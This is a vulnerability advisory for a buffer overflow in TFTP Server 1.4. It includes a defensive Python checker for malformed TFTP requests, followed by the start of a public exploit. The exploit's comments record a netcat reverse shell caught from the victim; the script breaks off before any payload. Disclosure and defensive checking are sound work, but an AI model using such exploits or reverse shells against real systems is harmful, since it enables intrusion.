Release date: 2012-01-11
Updated: 2012-05-16
Affected systems:
sourceforge tftp-server 1.4
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51364
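TFTP Server is a free multithreaded TFTP server for PXEBOOT.
TFTP Server 1.4 contains a buffer overflow vulnerability in its implementation; an attacker can exploit it to execute arbitrary code in the affected application.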
<*Source: b33f
*>
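A defender-side check for this class of bug, added here as an example and not part of the original advisory or b33f's script: it parses TFTP read/write requests (RRQ/WRQ) per RFC 1350 and flags over-long or malformed fields before they reach a server. The advisory does not say which field overflows or at what length, so `MAX_FILENAME`, the finding names and the sample payloads are assumptions.

```python
import struct

OP_RRQ, OP_WRQ = 1, 2
VALID_MODES = {b"netascii", b"octet", b"mail"}  # RFC 1350 transfer modes
MAX_REQUEST = 512   # RFC 2347: a request packet is at most 512 octets
MAX_FILENAME = 128  # assumed local policy limit, tune to your boot file paths
MAX_MODE = 8        # the longest valid mode, "netascii", is 8 bytes

def inspect_request(payload):
    """Return a list of findings for one UDP payload sent to port 69."""
    if len(payload) < 4:
        return ["truncated"]
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        return ["not-a-request"]
    findings = []
    if len(payload) > MAX_REQUEST:
        findings.append("oversized-packet")
    # Layout: opcode | filename | NUL | mode | NUL | [option NUL value NUL]...
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3 or fields[-1] != b"":
        findings.append("unterminated-field")
    filename = fields[0]
    mode = fields[1] if len(fields) > 1 else b""
    if len(filename) > MAX_FILENAME:
        findings.append("long-filename")
    if any(c < 0x20 or c > 0x7E for c in filename):
        findings.append("non-printable-filename")
    if len(mode) > MAX_MODE:
        findings.append("long-mode")
    elif mode.lower() not in VALID_MODES:
        findings.append("unknown-mode")
    return findings

# Constructed sample payloads (not captured traffic, filler bytes only).
SAMPLES = {
    "pxe boot": b"\x00\x01pxelinux.0\x00octet\x00",
    "with option": b"\x00\x01pxelinux.0\x00octet\x00blksize\x001468\x00",
    "long filename": b"\x00\x01" + b"A" * 1500 + b"\x00octet\x00",
    "long mode": b"\x00\x01boot.img\x00" + b"B" * 300 + b"\x00",
    "no terminator": b"\x00\x01boot.img\x00octet",
    "data packet": b"\x00\x03\x00\x01abc",
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:14} {inspect_request(payload) or 'ok'}")
```

The same field checks can run in a UDP proxy or over payloads extracted from a packet capture of port 69 traffic.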
Test method:
--------------------------------------------------------------------------------
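Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
b33f provided the following test method: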
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise... #
# #
# This tftp service have been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# #
# (2) Molotov ==> WRQ Overflow #
# #
# (3) tixxDZ ==> ERROR Overflow #
# #
# #
# Vulnerable software: #
# #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read #
# Request (RRQ) packet can also trigger a buffer overflow... #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear #
# as expected.... #
# #
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# C:\Program Files\TFTPServer> #
#---------------------------------------------------------------------------#
import socket
import sys
host = '192.168.111.128'
port = 69